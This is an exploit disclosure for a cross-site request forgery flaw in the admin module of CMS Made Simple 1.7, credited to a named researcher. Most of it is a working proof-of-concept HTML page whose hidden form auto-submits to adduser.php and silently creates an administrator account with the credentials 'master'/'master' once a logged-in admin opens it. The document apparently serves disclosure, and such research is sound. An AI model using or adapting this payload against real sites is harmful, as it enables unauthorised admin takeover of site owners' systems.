======================================================================= CMS Made Simple 1.7 CSRF Vulnerability ======================================================================= # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software CMS Made Simple 1.7 # Category CMS / Portals # Site p4ge http://server/demo/2/10/CMS_Made_Simple # Plateform php # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team) # Proof of concept # Targeted URL: http://sever/demo/2/10/CMS_Made_Simple Script to Add admin user through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post"> <input type=hidden name="sp_" value="64becc90"> <input type=hidden name="user" value="master"> <input type=hidden name="password" value="master"> <input type=hidden name="passwordagain" value="master"> <input type=hidden name="firstname" value="12345"> <input type=hidden name="lastname" value="12345"> <input type=hidden name="email" value="aa@aa.com"> <input type=hidden name="active" value="on"> <input type=hidden name="groups" value="1"> <input type=hidden name="g1" value="1"> <input type=hidden name="adduser" value="true"> </form> <script> document.csrf.submit(); </script> </body> </html> . .................................................................................................................. After execution just refresh the page and we can see that the admin user added automatically. #If you have any questions, comments, or concerns, feel free to contact me.